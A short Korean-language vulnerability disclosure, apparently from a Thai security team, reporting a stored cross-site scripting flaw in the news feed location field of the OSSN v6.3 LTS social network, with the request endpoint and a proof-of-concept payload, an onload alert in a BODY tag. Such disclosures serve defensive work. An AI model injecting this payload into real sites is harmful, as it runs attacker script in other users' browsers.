
OpenTeknik LLC OSSN OPEN SOURCE SOCIAL NETWORK v6.3 LTS에서 News Feed 모듈을 통해 저장형 크로스 사이트 스크립팅(XSS) 취약점이 발견되었습니다.
OpenTeknik LLC OSSN 오픈소스 소셜 네트워크 v6.3 LTS에서 News Feed 모듈을 통해 저장형 크로스 사이트 스크립팅(XSS) 취약점이 발견되었습니다.
공격자는 저장형 XSS를 악용하기 위해 "news feed"에 무언가를 게시하고 위치 입력란에 XSS 페이로드를 삽입해야 합니다. XSS 페이로드는 제출 직후 실행됩니다.
http://ip_address:port/ossn/home
POST /ossn/action/wall/post/a?ossn_ts=1656419179&ossn_token=83b0ebdb6b2bbbcbaa0b804ce5cf3b5fba29a25474715bf2f7e4bbbd85316a86
``
<BODY ONLOAD=alert('Grim-The-Ripper-Team-by-SOSECURE-Thailand')>
``
OSSN v6.3 LTS (https://github.com/opensource-socialnetwork/opensource-socialnetwork/releases/tag/6.3)
Google Chrome 버전 102.0.5005.115 (공식 빌드) (x86_64)
:shipit: Grim The Ripper Team by SOSECURE Thailand
참고 자료: